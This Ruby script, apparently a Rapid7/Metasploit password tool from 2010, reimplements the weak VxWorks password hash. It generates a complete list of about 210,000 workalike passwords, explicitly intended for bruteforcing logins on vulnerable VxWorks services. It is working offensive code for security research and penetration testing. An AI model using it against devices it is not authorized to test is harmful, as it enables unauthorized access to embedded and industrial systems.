tools/password/vxmaster.rb
#!/usr/bin/env ruby
#
# This script calculates all possible password hashes for the vxworks platform.
# The generated list can be used to bruteforce authentication to any service
# using the vulnerable password hashing mechanism on the backend.
#
# (C) 2010 Rapid7
#
#
# VxWorks converts the clear-text password into single integer value. This value
# can only be one of about 210,000 possible options. The method below emulates
# what the vxencrypt utility does and was implemented based on publicly indexed
# documentation and source code snippets.
#
#
# XXX: Newer VxWorks can use passwords up to 120 characters long, but this is
# not very common in the wild.
#
def vxworks_sum_from_pass(pass)
if pass.length < 8 or pass.length > 40
raise RuntimeError, "too short or too long"
end
sum = 0
bytes = pass.unpack("C*")
bytes.each_index {|i| sum += (bytes[i] * (i + 1)) ^ (i + 1) }
sum
end
# VxWorks does a final round of "mangling" on the generated additive sum. This
# mangle process does not add any additional security to the hashing mechanism
def vxworks_hash_from_sum(sum)
magic = 31695317
res = ((sum * magic) & 0xffffffff).to_s
res.unpack("C*").map{ |c|
c += 0x21 if c < 0x33
c += 0x2f if c < 0x37
c += 0x42 if c < 0x39
c
}.pack("C*")
end
# This method tries to find an exact match for a given sum. This is inefficient,
# but the master password only needs to be precomputed once.
def vxworks_pass_from_sum_refine(sum, bsum, pass)
0.upto(pass.length-1) do |i|
tpass = pass.dup
while ( tpass[i, 1].unpack("C*")[0] > 0x21 )
tpass[i, 1] = [ tpass[i, 1].unpack("C*")[0] - 1 ].pack("C")
bsum = vxworks_sum_from_pass(tpass)
if bsum == sum
return tpass
end
end
end
0.upto(pass.length-1) do |i|
tpass = pass.dup
while ( tpass[i, 1].unpack("C*")[0] < 0x7c )
tpass[i, 1] = [ tpass[i, 1].unpack("C*")[0] + 1 ].pack("C")
bsum = vxworks_sum_from_pass(tpass)
if bsum == sum
return tpass
end
end
end
"<failed>"
end
# This method locates a "workalike" password that matches a given
# intermediate additive sum value.
def vxworks_pass_from_sum(sum, lpass=nil)
opass = lpass || "\x20" * 8
pass = opass.dup
fmax = (sum > 10000) ? 0xff : 0x7b
pidx = 0
pcnt = pass[0,1].unpack("C*")[0]
more = false
bsum = vxworks_sum_from_pass(pass)
if bsum > sum
return "<invalid>"
end
while bsum != sum
if bsum > sum
return vxworks_pass_from_sum_refine(sum, bsum, pass)
end
if pcnt > fmax
pidx += 1
if pidx == (pass.length)
pass += " "
end
pcnt = pass[pidx, 1].unpack("C")[0]
end
pass[pidx,1] = [ pcnt ].pack("C")
bsum = vxworks_sum_from_pass(pass)
pcnt += 1
end
pass
end
outputfile = ARGV.shift() || "masterpasswords.txt"
# Create the master password list output file
ofd = File.open(outputfile, "wb")
# Generate a wide range of "seeds" - the goal is to create a
# workalike password with the smallest number of characters,
# but still be printable when possible.
seedsets = []
seeds = []
8.upto(8) do |slen|
0x23.upto(0x7c) do |cset|
sbase = [cset].pack("C") * slen
seeds << [ vxworks_sum_from_pass(sbase), sbase ]
end
end
seedsets << seeds
seeds = []
8.upto(12) do |slen|
0x23.upto(0x7c) do |cset|
sbase = [cset].pack("C") * slen
seeds << [ vxworks_sum_from_pass(sbase), sbase ]
end
end
seedsets << seeds
seeds = []
8.upto(16) do |slen|
0x23.upto(0xf0) do |cset|
sbase = [cset].pack("C") * slen
seeds << [ vxworks_sum_from_pass(sbase), sbase ]
end
end
seedsets << seeds
seeds = []
8.upto(16) do |slen|
0x23.upto(0xff) do |cset|
sbase = [cset].pack("C") * slen
seeds << [ vxworks_sum_from_pass(sbase), sbase ]
end
end
seedsets << seeds
seeds = []
8.upto(40) do |slen|
0x23.upto(0xff) do |cset|
sbase = [cset].pack("C") * slen
seeds << [ vxworks_sum_from_pass(sbase), sbase ]
end
end
seedsets << seeds
# Calculate passwords and their hashes for all possible outputs
1.upto(209656) do |i|
found = false
seedsets.each do |seeds|
lhash = nil
seeds.reverse.each do |s|
if i > (s[0] + 1000)
lhash = s[1]
break
end
end
hash = vxworks_hash_from_sum(i)
pass = vxworks_pass_from_sum(i, lhash)
puts "[*] Generated #{i} of 209656 passwords..." if (i % 1000 == 0)
# The first 1187 passwords are not very likely to occur and we skip
# generation. These are "sums" that result in a value lesss than a
# 8 digit password of all spaces.
if i > 1187 and pass =~ /<.*>/
# p "#{i} SEED '#{lhash}' => '#{hash}' => '#{pass}'"
next
end
ofd.puts "#{i}|#{hash}|#{pass}\x00"
found = true
break
end
if not found
puts "FAILED TO GENERATE #{i}"
exit(0)
end
end